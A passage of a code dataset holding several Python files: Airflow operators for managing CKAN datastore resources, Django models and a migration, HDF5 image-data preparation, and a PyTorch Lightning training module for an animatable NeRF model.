result\n\n\n\nclass DeleteDatastoreResourceOperator(BaseOperator):\n \"\"\"\n Deletes a datastore resource\n Inputs:\n - address: CKAN instance URL\n - apikey: CKAN API key\n - resource_id: CKAN resource id to be deleted\n\n Resource id can be given with n actual value, or with a reference to a task_id and task_key that returns the value\n \n Note: Deleting the entire resource also deletes the data dictionary (i.e. schema, field definitions and types). \n To keep the existing schema, delete the datastore resource records instead by using the DeleteDatastoreResourceRecordsOperator - this keeps the schema.\n \"\"\"\n\n @apply_defaults\n def __init__(\n self,\n address: str,\n apikey: str,\n resource_id: str = None,\n resource_id_task_id: str = None,\n resource_id_task_key: str = None,\n **kwargs,\n ) -> None:\n # init ckan client and resource_id to be truncated\n super().__init__(**kwargs)\n self.resource_id, self.resource_id_task_id, self.resource_id_task_key = resource_id, resource_id_task_id, resource_id_task_key\n self.ckan = ckanapi.RemoteCKAN(apikey=apikey, address=address)\n\n\n def execute(self, context):\n # get task instance from context\n ti = context['ti']\n\n # get resource id from task, if task info provided in input\n if self.resource_id_task_id and self.resource_id_task_key:\n self.resource_id = ti.xcom_pull(task_ids=self.resource_id_task_id)[self.resource_id_task_key]\n self.resource = ti.xcom_pull(task_ids=self.resource_id_task_id)\n logging.info(self.resource)\n logging.info(\"Pulled {} from {} via xcom\".format(self.resource_id, self.resource_id_task_id) )\n\n assert self.resource_id, \"Resource ID is empty! This operator needs a way to get the resource ID in order to delete the right datastore resource!\"\n # Delete the resource\n try:\n self.ckan.action.datastore_delete(id=self.resource_id, force=True)\n logging.info(\"Deleted \" + self.resource_id)\n\n except Exception as e:\n logging.error(\"Error while trying to delete resource: \" + e)\n\n\n\nclass DeleteDatastoreResourceRecordsOperator(BaseOperator):\n \"\"\"\n Deletes datastore resource records. Args:\n - address: CKAN instance URL\n - apikey: CKAN API key\n - backup_task_id: task_id that returns backup file information (BackupDatastoreResourceOperator)\n \"\"\"\n\n @apply_defaults\n def __init__(\n self, address: str, apikey: str, backup_task_id: str, **kwargs,\n ) -> None:\n super().__init__(**kwargs)\n self.backup_task_id = backup_task_id\n self.ckan = ckanapi.RemoteCKAN(apikey=apikey, address=address)\n\n def execute(self, context):\n backups_info = context[\"ti\"].xcom_pull(task_ids=self.backup_task_id)\n\n self.ckan.action.datastore_delete(id=backups_info[\"resource_id\"], force=True)\n\n with open(Path(backups_info[\"fields_file_path\"]), \"r\") as f:\n fields = json.load(f)\n\n self.ckan.action.datastore_create(id=backups_info[\"resource_id\"], fields=fields, force=True)\n\n record_count = self.ckan.action.datastore_search(\n id=backups_info[\"resource_id\"], limit=0\n )[\"total\"]\n\n assert record_count == 0, f\"Resource not empty after cleanup: {record_count}\"\n\n\nclass InsertDatastoreResourceRecordsOperator(BaseOperator):\n @apply_defaults\n def __init__(\n self,\n address: str,\n apikey: str,\n resource_task_id: str,\n parquet_filepath_task_id: str = None,\n fields_json_path_task_id: str = None,\n chunk_size: int = 20000,\n **kwargs,\n ) -> None:\n super().__init__(**kwargs)\n self.parquet_filepath_task_id = parquet_filepath_task_id\n self.resource_task_id = resource_task_id\n self.chunk_size = chunk_size\n self.fields_json_path_task_id = fields_json_path_task_id\n self.ckan = ckanapi.RemoteCKAN(apikey=apikey, address=address)\n\n def _create_empty_resource_with_fields(self, fields_path, resource_id):\n with open(fields_path, \"r\") as f:\n fields = json.load(f)\n\n self.ckan.action.datastore_create(id=resource_id, fields=fields, force=True)\n\n def execute(self, context):\n ti = context[\"ti\"]\n resource = ti.xcom_pull(task_ids=self.resource_task_id)\n\n if self.fields_json_path_task_id is not None:\n fields_path = Path(ti.xcom_pull(task_ids=self.fields_json_path_task_id))\n self._create_empty_resource_with_fields(fields_path, resource[\"id\"])\n\n if self.parquet_filepath_task_id is not None:\n path = Path(ti.xcom_pull(task_ids=self.parquet_filepath_task_id))\n\n data = pd.read_parquet(path)\n records = data.to_dict(orient=\"records\")\n\n chunks = [\n records[i : i + self.chunk_size]\n for i in range(0, len(records), self.chunk_size)\n ]\n\n for chunk in chunks:\n clean_records = []\n logging.info(f\"Removing NaNs and inserting {len(records)} records\")\n for r in chunk:\n record = {}\n for key, value in r.items():\n if value == value:\n record[key] = value\n clean_records.append(record)\n\n self.ckan.action.datastore_create(\n id=resource[\"id\"], records=clean_records, force=True\n )\n\n logging.info(f\"Records inserted: {data.shape[0]}\")\n\n return data.shape[0]\n\n\nclass RestoreDatastoreResourceBackupOperator(BaseOperator):\n @apply_defaults\n def __init__(\n self, address: str, apikey: str, backup_task_id: str, **kwargs,\n ) -> None:\n super().__init__(**kwargs)\n self.backup_task_id = backup_task_id\n self.ckan = ckanapi.RemoteCKAN(apikey=apikey, address=address)\n\n def execute(self, context):\n backups_info = context[\"ti\"].xcom_pull(task_ids=self.backup_task_id)\n\n assert backups_info is not None, \"No backup information\"\n\n resource_id = backups_info[\"resource_id\"]\n\n with open(Path(backups_info[\"fields_file_path\"]), \"r\") as f:\n fields = json.load(f)\n\n data = pd.read_parquet(Path(backups_info[\"data_file_path\"]))\n records = data.to_dict(orient=\"records\")\n\n try:\n self.ckan.action.datastore_delete(id=resource_id)\n except Exception as e:\n logging.error(e)\n\n result = self.ckan.action.datastore_create(\n id=resource_id, fields=fields, records=records\n )\n\n logging.info(f\"Result: {result}\")\n\n return result\n\n\n\nclass InsertDatastoreResourceRecordsFromJSONOperator(BaseOperator):\n '''\n Reads a JSON file and write the output into a CKAN datastore resource.\n JSON must be a list of dicts, with each dict being a record, like the following:\n [\n { \"column1\": \"string\", \"column2\": 100, \"column3\": true},\n { \"column1\": \"some other string\", \"column2\": 34, \"column3\": false}\n ]\n\n The fields must match the CKAN standard, like the following:\n [\n {\n \"id\": \"column1\", \n \"type\": \"text\" ,\n \"info\": {\n \"notes\": \"Description of the field goes here. Info key is optional.\"\n }\n },\n {\n \"id\": \"column2\", \n \"type\": \"int\"\n },\n {\n \"id\": \"column3\", \n \"type\": \"bool\"\n }\n ]\n \n Expects as inputs:\n - address - url of target ckan\n - apikey - key needed to make authorized ckan calls\n - resource_id - id of the resource that will receive this data\n - data_path - location of the json data file\n - fields_path - location of the data's fields, already in a CKAN-friendly format\n\n All of the above, except the address and apikey, can be given with an actual value, or with a reference to a task_id and task_key that returns the value\n '''\n @apply_defaults\n def __init__(\n self,\n address: str,\n apikey: str,\n\n resource_id: str = None,\n resource_id_task_id: str = None,\n resource_id_task_key: str = None,\n\n data_path: str = None,\n data_path_task_id: str = None,\n data_path_task_key: str = None,\n\n fields_path: str = None,\n fields_path_task_id: str = None,\n fields_path_task_key: str = None,\n\n **kwargs,\n ) -> None:\n super().__init__(**kwargs)\n self.resource_id, self.resource_id_task_id, self.resource_id_task_key = resource_id, resource_id_task_id, resource_id_task_key\n self.data_path, self.data_path_task_id, self.data_path_task_key = data_path, data_path_task_id, data_path_task_key\n self.fields_path, self.fields_path_task_id, self.fields_path_task_key = fields_path, fields_path_task_id, fields_path_task_key\n self.ckan = ckanapi.RemoteCKAN(apikey=apikey, address=address)\n\n\n def execute(self, context):\n # init task instance from context\n ti = context['ti']\n\n # assign important vars if provided from other tasks\n if self.resource_id_task_id and self.resource_id_task_key:\n self.resource_id = ti.xcom_pull(task_ids=self.resource_id_task_id)[self.resource_id_task_key]\n\n if self.data_path_task_id and self.data_path_task_key:\n self.data_path = ti.xcom_pull(task_ids=self.data_path_task_id)[self.data_path_task_key]\n\n if self.fields_path_task_id and self.fields_path_task_key:\n self.fields_path = ti.xcom_pull(task_ids=self.fields_path_task_id)[self.fields_path_task_key]\n\n\n # get fields from file\n with open(self.fields_path, \"r\") as f:\n fields = json.load(f)\n logging.info(\"Loaded the following fields from {}: {}\".format( self.fields_path, fields ))\n\n # populate that resource w data from the path provided\n assert self.data_path, \"Data path, or the filepath to the data to be inserted, must be provided!\"\n with open(self.data_path) as f:\n data = json.load(f)\n \n logging.info(\"Data parsed from JSON file\")\n logging.info(\"Fields from fields file: \" + str(fields))\n logging.info(\"Fields from data file: \" + str(data[0].keys()))\n\n self.ckan.action.datastore_create(id=self.resource_id, fields=fields, records=data)\n logging.info(\"Resource created and populated from input fields and data\")\n\n return {\"resource_id\": self.resource_id, \"data_inserted\": len(data)}\n\n "} {"ext": "py", "sha": "1a2ed2604bd803aec2ca1994ff502f014e0ffc81", "content": "import os\nimport torch\n\nfrom utils.runs import Run\nfrom utils.utils import print_message, save_checkpoint\nfrom parameters import SAVED_CHECKPOINTS\n\n\ndef print_progress(scores):\n positive_avg, negative_avg = round(scores[:, 0].mean().item(), 2), round(scores[:, 1].mean().item(), 2)\n print(\"#>>> \", positive_avg, negative_avg, '\\t\\t|\\t\\t', positive_avg - negative_avg)\n\n\ndef manage_checkpoints(args, colbert, optimizer, batch_idx):\n arguments = args.input_arguments.__dict__\n\n path = os.path.join(Run.path, 'checkpoints')\n\n if not os.path.exists(path):\n os.mkdir(path)\n\n if batch_idx % 2000 == 0:\n name = os.path.join(path, \"colbert.dnn\")\n save_checkpoint(name, 0, batch_idx, colbert, optimizer, arguments)\n\n if batch_idx in SAVED_CHECKPOINTS:\n name = os.path.join(path, \"colbert-{}.dnn\".format(batch_idx))\n save_checkpoint(name, 0, batch_idx, colbert, optimizer, arguments)\n"} {"ext": "py", "sha": "1a2ed37fea8e4429bfb60b85d8d46565ef016023", "content": "from dataclasses import dataclass\nfrom bindings.gmd.operation_method_property_type import OperationMethodPropertyType\n\n__NAMESPACE__ = \"http://www.opengis.net/gml\"\n\n\n@dataclass\nclass OperationMethodRef(OperationMethodPropertyType):\n class Meta:\n name = \"operationMethodRef\"\n namespace = \"http://www.opengis.net/gml\"\n"} {"ext": "py", "sha": "1a2ed38f590f29ace6484c9226f88b9f4ac5951b", "content": "import os\n\nimport numpy as np\nimport tables\nimport os\n\nfrom .normalize import normalize_data_storage, reslice_image_set\n\n\ndef create_data_file(out_file, n_channels, n_samples, n_truth_labels, image_shape):\n \"\"\" Initializes the hdf5 file and gives pointers for its three arrays\n \"\"\"\n try:\n os.makedirs(os.path.dirname(out_file))\n except:\n pass\n\n hdf5_file = tables.open_file(out_file, mode='w')\n filters = tables.Filters(complevel=5, complib='blosc')\n data_shape = tuple([0, n_channels] + list(image_shape))\n truth_shape = tuple([0, n_truth_labels] + list(image_shape))\n\n data_storage = hdf5_file.create_earray(hdf5_file.root, 'data', tables.Float32Atom(), shape=data_shape,\n filters=filters, expectedrows=n_samples)\n truth_storage = hdf5_file.create_earray(hdf5_file.root, 'truth', tables.UInt8Atom(), shape=truth_shape,\n filters=filters, expectedrows=n_samples)\n affine_storage = hdf5_file.create_earray(hdf5_file.root, 'affine', tables.Float32Atom(), shape=(0, 4, 4),\n filters=filters, expectedrows=n_samples)\n return hdf5_file, data_storage, truth_storage, affine_storage\n\n\ndef write_image_data_to_file(image_files, data_storage, truth_storage, image_shape, n_channels, affine_storage,\n truth_dtype=np.uint8, crop=True):\n for set_of_files in image_files: # set_of_files is both the volume file and the label file\n images = reslice_image_set(set_of_files, image_shape, label_indices=len(set_of_files) - 1,\n crop=crop) # both volume and label is resliced\n subject_data = [image.get_data() for image in images]\n add_data_to_storage(data_storage, truth_storage, affine_storage, subject_data, images[0].affine, n_channels,\n truth_dtype)\n return data_storage, truth_storage\n\n\ndef add_data_to_storage(data_storage, truth_storage, affine_storage, subject_data, affine, n_channels, truth_dtype):\n data_storage.append(np.asarray(subject_data[:n_channels])[\n np.newaxis]) # Anything but the last element of subject_data must be volume data\n\n # split_truth_into_binary_labels(subject_data[n_channels])\n # what_to_append = split_truth_into_binary_labels(subject_data[n_channels], truth_dtype, truth_labels)[np.newaxis]\n # truth_storage.append(what_to_append)\n truth_storage.append(np.asarray(subject_data[n_channels], dtype=truth_dtype)[np.newaxis][\n np.newaxis]) # the last element of subject_data must be the labels\n affine_storage.append(np.asarray(affine)[np.newaxis])\n\n\ndef write_data_to_file(training_data_files, out_file, image_shape, truth_dtype=np.uint8, subject_ids=None,\n normalize=True, crop=True):\n \"\"\"\n Takes in a set of training images and writes those images to an hdf5 file.\n :param training_data_files: List of tuples containing the training data files. The modalities should be listed in\n the same order in each tuple. The last item in each tuple must be the labeled image. \n Example: [('sub1-T1.nii.gz', 'sub1-T2.nii.gz', 'sub1-truth.nii.gz'), \n ('sub2-T1.nii.gz', 'sub2-T2.nii.gz', 'sub2-truth.nii.gz')]\n :param out_file: Where the hdf5 file will be written to.\n :param image_shape: Shape of the images that will be saved to the hdf5 file.\n :param truth_dtype: Default is 8-bit unsigned integer. \n :return: Location of the hdf5 file with the image data written to it. \n \"\"\"\n n_samples = len(training_data_files)\n n_channels = len(training_data_files[0]) - 1\n n_truth_labels = 1\n\n try:\n hdf5_file, data_storage, truth_storage, affine_storage = create_data_file(out_file,\n n_channels=n_channels,\n n_samples=n_samples,\n n_truth_labels=n_truth_labels,\n image_shape=image_shape)\n except Exception as e:\n # If something goes wrong, delete the incomplete data file\n os.remove(out_file)\n raise e\n\n write_image_data_to_file(training_data_files, data_storage, truth_storage, image_shape, truth_dtype=truth_dtype,\n n_channels=n_channels, affine_storage=affine_storage, crop=crop)\n if subject_ids:\n hdf5_file.create_earray(hdf5_file.root, 'subject_ids', obj=subject_ids)\n if normalize:\n normalize_data_storage(data_storage)\n hdf5_file.close()\n return out_file\n\n\ndef open_data_file(filename, readwrite=\"r\"):\n return tables.open_file(filename, readwrite)\n"} {"ext": "py", "sha": "1a2ed3af00dd0272577cc60cc2b72f17f5efad1f", "content": "\n# -*- coding: utf-8 -*-\n\nfrom django.db import models\nfrom django.utils.encoding import python_2_unicode_compatible\nfrom parler.models import TranslatableModel, TranslatedFields\n\n\nclass TimeStampedModel(models.Model):\n created_at = models.DateTimeField(auto_now_add=True)\n modified_at = models.DateTimeField(auto_now=True)\n\n class Meta:\n abstract = True\n\n\n@python_2_unicode_compatible\nclass AuthenticationSource(TimeStampedModel, TranslatableModel):\n \"\"\"MPASS authentication sources.\"\"\"\n auth_id = models.CharField(max_length=128)\n icon_url = models.CharField(max_length=2048, blank=True, null=True)\n tags = models.ManyToManyField('AuthenticationTag', blank=True)\n translations = TranslatedFields(\n title=models.CharField(max_length=2048)\n )\n\n @property\n def shib_auth_selection_parameter(self):\n return 'authnContextClassRef=urn:mpass.id:authnsource:%s' % self.auth_id\n\n def __str__(self):\n return self.auth_id\n\n\n@python_2_unicode_compatible\nclass AuthenticationTag(TimeStampedModel, TranslatableModel):\n \"\"\"MPASS authentication tags used for grouping AuthenticationSources.\"\"\"\n tag_id = models.CharField(max_length=128)\n translations = TranslatedFields(\n title=models.CharField(max_length=2048)\n )\n\n @property\n def shib_auth_selection_parameter(self):\n return 'authnContextClassRef=urn:mpass.id:authntag:%s' % self.auth_id\n\n def __str__(self):\n return self.tag_id\n\n\n@python_2_unicode_compatible\nclass Service(TimeStampedModel, TranslatableModel):\n \"\"\"MPASS Service.\"\"\"\n service_id = models.CharField(max_length=128)\n icon_url = models.CharField(max_length=2048, blank=True, null=True)\n service_url = models.CharField(max_length=2048, blank=True, null=True)\n sso_url = models.CharField(max_length=2048, blank=True, null=True)\n translations = TranslatedFields(\n description=models.CharField(max_length=2048),\n title=models.CharField(max_length=2048)\n )\n\n def __str__(self):\n return self.service_id\n\n# vim: tabstop=2 expandtab shiftwidth=2 softtabstop=2\n\n"} {"ext": "py", "sha": "1a2ed3bf39547120ff86d95576269db1453f8e77", "content": "# Generated by Django 2.1.3 on 2018-11-23 05:47\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('multiplicity', '0008_datasettypestructure_icon'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Photo',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('created_at', models.DateTimeField(auto_now_add=True)),\n ('updated_at', models.DateTimeField(auto_now=True)),\n ('image', models.ImageField(blank=True, null=True, upload_to='photos')),\n ('author', models.CharField(max_length=255)),\n ('source_url', models.CharField(blank=True, max_length=255, null=True)),\n ('description', models.TextField(blank=True, null=True)),\n ('deleted', models.BooleanField(db_index=True, default=False)),\n ('space', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='multiplicity.ReferenceSpace')),\n ('uploaded_by', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'ordering': ['-created_at', '-updated_at'],\n 'abstract': False,\n },\n ),\n ]\n"} {"ext": "py", "sha": "1a2ed4161d2439401a69c931198a039dbc93f74f", "content": "import os\nimport time\nfrom collections import defaultdict\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nfrom torchvision.utils import save_image\n\nfrom config import get_cfg\n# models\nfrom models.volume_rendering import VolumeRenderer\nfrom models.anim_nerf import AnimNeRF\nfrom models.body_model_params import BodyModelParams\n# losses\n# datasets\nfrom datasets import dataset_dict\n# optimizer, scheduler, visualization\nfrom utils import *\nfrom utils.util import load_pickle_file\n\n\n# pytorch-lightning\nfrom torchmetrics.functional import psnr, ssim\nfrom pytorch_lightning.callbacks import ModelCheckpoint\nfrom pytorch_lightning import LightningDataModule, LightningModule, Trainer\nfrom pytorch_lightning.loggers import TensorBoardLogger\n\n\nclass AnimNeRFData(LightningDataModule):\n def __init__(self, hparams):\n super(AnimNeRFData, self).__init__()\n # self.hparams = hparams\n self.save_hyperparameters(hparams)\n \n def setup(self, stage=None):\n dataset = dataset_dict[self.hparams.dataset_name]\n\n if self.hparams.deformation_dim + self.hparams.apperance_dim > 0 or self.hparams.optim_body_params:\n frame_ids_index = {}\n for i, frame_id in enumerate(self.hparams.frame_IDs):\n frame_ids_index[frame_id] = i\n else:\n frame_ids_index = None\n \n kwargs = {'root_dir': self.hparams.root_dir,\n 'img_wh': tuple(self.hparams.img_wh),\n 'frame_start_ID': self.hparams.train.frame_start_ID,\n 'frame_end_ID': self.hparams.train.frame_end_ID,\n 'frame_skip': self.hparams.train.frame_skip,\n 'subsampletype': self.hparams.train.subsampletype,\n 'subsamplesize': self.hparams.train.subsamplesize,\n 'model_type': self.hparams.model_type,\n 'cam_IDs': self.hparams.train.cam_IDs\n }\n self.train_dataset = dataset(mode='train', frame_ids_index=frame_ids_index, **kwargs)\n\n kwargs = {'root_dir': self.hparams.root_dir,\n 'img_wh': tuple(self.hparams.img_wh),\n 'frame_start_ID': self.hparams.val.frame_start_ID,\n 'frame_end_ID': self.hparams.val.frame_end_ID,\n 'frame_skip': self.hparams.val.frame_skip,\n 'model_type': self.hparams.model_type,\n 'cam_IDs': self.hparams.val.cam_IDs\n }\n self.val_dataset = dataset(mode='val', frame_ids_index=frame_ids_index, **kwargs)\n\n kwargs = {'root_dir': self.hparams.root_dir,\n 'img_wh': tuple(self.hparams.img_wh),\n 'frame_start_ID': self.hparams.test.frame_start_ID,\n 'frame_end_ID': self.hparams.test.frame_end_ID,\n 'frame_skip': self.hparams.test.frame_skip,\n 'model_type': self.hparams.model_type,\n 'cam_IDs': self.hparams.test.cam_IDs\n }\n self.test_dataset = dataset(mode='val', frame_ids_index=frame_ids_index, **kwargs)\n \n def train_dataloader(self):\n return DataLoader(self.train_dataset,\n shuffle=True,\n num_workers=self.hparams.train.num_workers,\n batch_size=self.hparams.train.batch_size,\n pin_memory=False)\n\n def val_dataloader(self):\n return DataLoader(self.val_dataset,\n shuffle=False,\n num_workers=self.hparams.val.num_workers,\n batch_size=self.hparams.val.batch_size, # validate one image (H*W rays) at a time\n pin_memory=False)\n \n def test_dataloader(self):\n return DataLoader(self.test_dataset,\n shuffle=False,\n num_workers=self.hparams.test.num_workers,\n batch_size=self.hparams.test.batch_size, # validate one image (H*W rays) at a time\n pin_memory=False)\n\nclass AnimNeRFSystem(LightningModule):\n def __init__(self, hparams):\n super(AnimNeRFSystem, self).__init__()\n # self.hparams = hparams\n self.save_hyperparameters(hparams)\n\n self.anim_nerf = AnimNeRF(\n model_path=self.hparams.model_path,\n model_type=self.hparams.model_type,\n gender=self.hparams.gender,\n freqs_xyz=self.hparams.freqs_xyz,\n freqs_dir=self.hparams.freqs_dir,\n use_view=self.hparams.use_view,\n k_neigh=self.hparams.k_neigh,\n use_knn=self.hparams.use_knn,\n use_unpose=self.hparams.use_unpose,\n unpose_view=self.hparams.unpose_view,\n use_deformation=self.hparams.use_deformation,\n pose_dim=self.hparams.pose_dim,\n deformation_dim=self.hparams.deformation_dim,\n apperance_dim=self.hparams.apperance_dim,\n use_fine=self.hparams.n_importance>0 or self.hparams.n_depth>0,\n share_fine=self.hparams.share_fine,\n dis_threshold=self.hparams.dis_threshold,\n query_inside=self.hparams.query_inside,\n )\n\n self.models = [self.anim_nerf]\n\n if self.hparams.deformation_dim > 0 or self.hparams.apperance_dim > 0:\n self.hparams.latent_dim = self.hparams.deformation_dim + self.hparams.apperance_dim\n self.latent_codes = nn.Embedding(self.hparams.num_frames, self.hparams.latent_dim)\n self.latent_codes.weight.data.normal_(0, 0.1)\n self.models += [self.latent_codes]\n\n self.body_model_params = BodyModelParams(self.hparams.num_frames, model_type=self.hparams.model_type)\n self.load_body_model_params()\n if self.hparams.optim_body_params:\n optim_params = self.body_model_params.param_names\n for param_name in optim_params:\n self.body_model_params.set_requires_grad(param_name, requires_grad=True)\n self.models += [self.body_model_params]\n\n self.volume_renderer = VolumeRenderer(n_coarse=self.hparams.n_samples, n_fine=self.hparams.n_importance, n_fine_depth=self.hparams.n_depth, share_fine=self.hparams.share_fine, white_bkgd=self.hparams.white_bkgd)\n\n def load_body_model_params(self):\n body_model_params = {param_name: [] for param_name in self.body_model_params.param_names}\n body_model_params_dir = os.path.join(self.hparams.root_dir, '{}s'.format(self.hparams.model_type))\n \n for frame_id in self.hparams.frame_IDs:\n params = load_pickle_file(os.path.join(body_model_params_dir, \"{:0>6}.pkl\".format(frame_id)))\n for param_name in body_model_params.keys():\n body_model_params[param_name].append(torch.from_numpy(params[param_name]).float().unsqueeze(0))\n for param_name in body_model_params.keys():\n body_model_params[param_name] = torch.cat(body_model_params[param_name], dim=0)\n self.body_model_params.init_parameters(param_name, body_model_params[param_name], requires_grad=False) \n\n @torch.no_grad()\n def decode_batch(self, batch):\n frame_id = batch['frame_id']\n cam_id = batch['cam_id']\n frame_idx = batch['frame_idx']\n rays = batch['rays'] # (bs, n_rays, 8)\n rgbs = batch['rgbs'] # (bs, n_rays, 3)\n alphas = batch['alphas'] # (bs, n_rays, 1)\n body_model_params = {\n 'betas': batch['betas'],\n 'global_orient': batch['global_orient'],\n 'body_pose': batch['body_pose'],\n 'transl': batch['transl']\n }\n body_model_params_template = {\n 'betas': batch['betas_template'],\n 'global_orient': batch['global_orient_template'],\n 'body_pose': batch['body_pose_template'],\n 'transl': batch['transl_template']\n }\n fg_points = batch['fg_points'] # (bs, num_points, 3)\n bg_points = batch['bg_points'] # (bs, num_points, 3)\n \n return frame_id, cam_id, frame_idx, rays, rgbs, alphas, body_model_params, body_model_params_template, fg_points, bg_points\n\n def forward(self, rays, body_model_params, body_model_params_template, latent_code=None, perturb=1.0):\n bs, n_rays = rays.shape[:2]\n results = defaultdict(list)\n chunk = self.hparams.chunk\n\n self.anim_nerf.set_body_model(body_model_params, body_model_params_template)\n rays = self.anim_nerf.convert_to_body_model_space(rays)\n self.anim_nerf.clac_ober2cano_transform()\n\n if latent_code is not None:\n self.anim_nerf.set_latent_code(latent_code)\n\n for i in range(0, n_rays, chunk):\n rays_chunk = rays[:, i:i+chunk, :]\n rendered_ray_chunks = self.volume_renderer(self.anim_nerf, rays_chunk, perturb=perturb)\n \n for k, v in rendered_ray_chunks.items():\n results[k] += [v]\n \n for k, v in results.items():\n results[k] = torch.cat(v, 1)\n\n return results\n\n def configure_optimizers(self):\n parameters = [ {'params': self.anim_nerf.parameters(), 'lr': self.hparams.train.lr}]\n if self.hparams.deformation_dim > 0 or self.hparams.apperance_dim > 0:\n parameters.append({'params': self.latent_codes.parameters(), 'lr': self.hparams.train.lr})\n if self.hparams.optim_body_params:\n parameters.append({'params': self.body_model_params.parameters(), 'lr': self.hparams.train.lr*0.5})\n self.optimizer = get_optimizer(self.hparams.train, parameters)\n self.scheduler = get_scheduler(self.hparams.train, self.optimizer)\n \n return [self.optimizer], [self.scheduler]\n \n def compute_loss(self, rgbs, alphas, results, frame_idx=None, latent_code=None, fg_points=None, bg_points=None):\n loss = 0\n loss_details = {}\n\n # rgb\n loss_rgb = F.mse_loss(results['rgbs'], rgbs, reduction='mean')\n loss += loss_rgb\n loss_details['loss_rgb'] = loss_rgb\n \n if self.hparams.n_importance > 0 and not self.hparams.share_fine:\n loss_rgb_fine = F.mse_loss(results['rgbs_fine'], rgbs, reduction='mean')\n loss += loss_rgb_fine\n loss_details['loss_rgb_fine'] = loss_rgb_fine\n\n # alphas\n loss_alphas = F.l1_loss(results['alphas'], alphas)\n loss += self.hparams.train.lambda_alphas * loss_alphas\n loss_details['loss_alphas'] = loss_alphas\n\n if self.hparams.n_importance > 0 and not self.hparams.share_fine:\n loss_alphas_fine = F.l1_loss(results['alphas_fine'], alphas)\n loss += self.hparams.train.lambda_alphas * loss_alphas_fine\n loss_details['loss_alphas_fine'] = loss_alphas_fine\n\n\n # if latent_code is not None:\n # loss_latent = torch.mean(torch.pow(latent_code, 2))\n # loss += self.hparams.lambda_latent * loss_latent\n # loss_details['loss_latent'] = loss_latent\n \n # frame_idx_ = torch.clamp(frame_idx+1, 0, self.hparams.num_frames)\n # latent_code_ = self.latent_codes(frame_idx_)\n # loss_latent_smooth = F.mse_loss(latent_code, latent_code_)\n # loss += self.hparams.lambda_latent_smooth * loss_latent_smooth\n # loss_details['loss_latent_smooth'] = loss_latent_smooth\n \n if self.hparams.use_unpose and fg_points is not None:\n fg_points_sigma = self.anim_nerf.query_canonical_space(fg_points, use_fine=False, only_sigma=True)\n loss_foreground = torch.mean(torch.exp(-2.0/self.hparams.n_samples * torch.relu(fg_points_sigma)))\n loss += self.hparams.train.lambda_foreground * loss_foreground\n loss_details['loss_foreground'] = loss_foreground\n\n if self.hparams.n_importance > 0 and not self.hparams.share_fine:\n fg_points_sigma_fine = self.anim_nerf.query_canonical_space(fg_points, use_fine=True, only_sigma=True)\n loss_foreground_fine = torch.mean(torch.exp(-2.0/self.hparams.n_samples * torch.relu(fg_points_sigma_fine)))\n loss += self.hparams.train.lambda_foreground * loss_foreground_fine\n loss_details['loss_foreground_fine'] = loss_foreground_fine\n \n if self.hparams.use_unpose and bg_points is not None:\n bg_points_sigma = self.anim_nerf.query_canonical_space(bg_points, use_fine=False, only_sigma=True)\n loss_background = torch.mean(1 - torch.exp(-2.0/self.hparams.n_samples * torch.relu(bg_points_sigma)))\n loss += self.hparams.train.lambda_background * loss_background\n loss_details['loss_background'] = loss_background\n\n if self.hparams.n_importance > 0 and not self.hparams.share_fine:\n bg_points_sigma_fine = self.anim_nerf.query_canonical_space(bg_points, use_fine=True, only_sigma=True)\n loss_background_fine = torch.mean(1 - torch.exp(-2.0/self.hparams.n_samples * torch.relu(bg_points_sigma_fine)))\n loss += self.hparams.train.lambda_background * loss_background_fine\n loss_details['loss_background_fine'] = loss_background_fine\n\n # normal\n points = self.anim_nerf.verts_template.detach()\n points += torch.randn_like(points) * self.hparams.dis_threshold * 0.5\n points_neighbs = points + torch.randn_like(points) * self.hparams.train.epsilon\n points_normal = self.anim_nerf.query_canonical_space(points, use_fine=False, only_normal=True)\n points_neighbs_normal = self.anim_nerf.query_canonical_space(points_neighbs, use_fine=False, only_normal=True)\n points_normal = points_normal / (torch.norm(points_normal, p=2, dim=-1, keepdim=True) + 1e-5)\n points_neighbs_normal = points_neighbs_normal / (torch.norm(points_neighbs_normal, p=2, dim=-1, keepdim=True) + 1e-5)\n loss_normals = F.mse_loss(points_normal, points_neighbs_normal)\n # loss_normals = torch.mean((torch.norm(points_normal, p=2, dim=-1) - 1)**2)\n loss += self.hparams.train.lambda_normals * loss_normals\n loss_details['loss_normals'] = loss_normals\n\n if self.hparams.n_importance > 0 and not self.hparams.share_fine:\n points_normal_fine = self.anim_nerf.query_canonical_space(points, use_fine=True, only_normal=True)\n points_neighbs_normal_fine = self.anim_nerf.query_canonical_space(points_neighbs, use_fine=True, only_normal=True)\n points_normal_fine = points_normal_fine / (torch.norm(points_normal_fine, p=2, dim=-1, keepdim=True) + 1e-5)\n points_neighbs_normal_fine = points_neighbs_normal_fine / (torch.norm(points_neighbs_normal_fine, p=2, dim=-1, keepdim=True) + 1e-5)\n loss_normals_fine = F.mse_loss(points_normal_fine, points_neighbs_normal_fine)\n # loss_normals_fine = torch.mean((torch.norm(points_normal_fine, p=2, dim=-1) - 1)**2)\n loss += self.hparams.train.lambda_normals * loss_normals_fine\n loss_details['loss_normals_fine'] = loss_normals_fine\n\n # if body_model_params is not None:\n # loss_pose = F.mse_loss(results['joints'].clone(), self.anim_nerf.model(**body_model_params)['joints'].clone())\n # loss += self.hparams.lambda_pose * loss_pose\n # loss_details['loss_pose'] = loss_pose\n\n # frame_id_ = torch.clamp(frame_id+1, 0, self.body_model_params.num_frame-1)\n # body_model_params_ref_ = self.body_model_params(frame_id_)\n # loss_pose_smooth = F.mse_loss(self.anim_nerf.joints, self.anim_nerf.model(**body_model_params_ref_)['joints'])\n # loss += self.hparams.lambda_pose_smooth * loss_pose_smooth\n # loss_details['loss_pose_smooth'] = loss_pose_smooth\n\n return loss, loss_details\n\n def training_step(self, batch, batch_nb):\n frame_id, cam_id, frame_idx, rays, rgbs, alphas, body_model_params, body_model_params_template, fg_points, bg_points = self.decode_batch(batch)\n if self.hparams.latent_dim > 0:\n latent_code = self.latent_codes(frame_idx)\n else:\n latent_code = None\n if 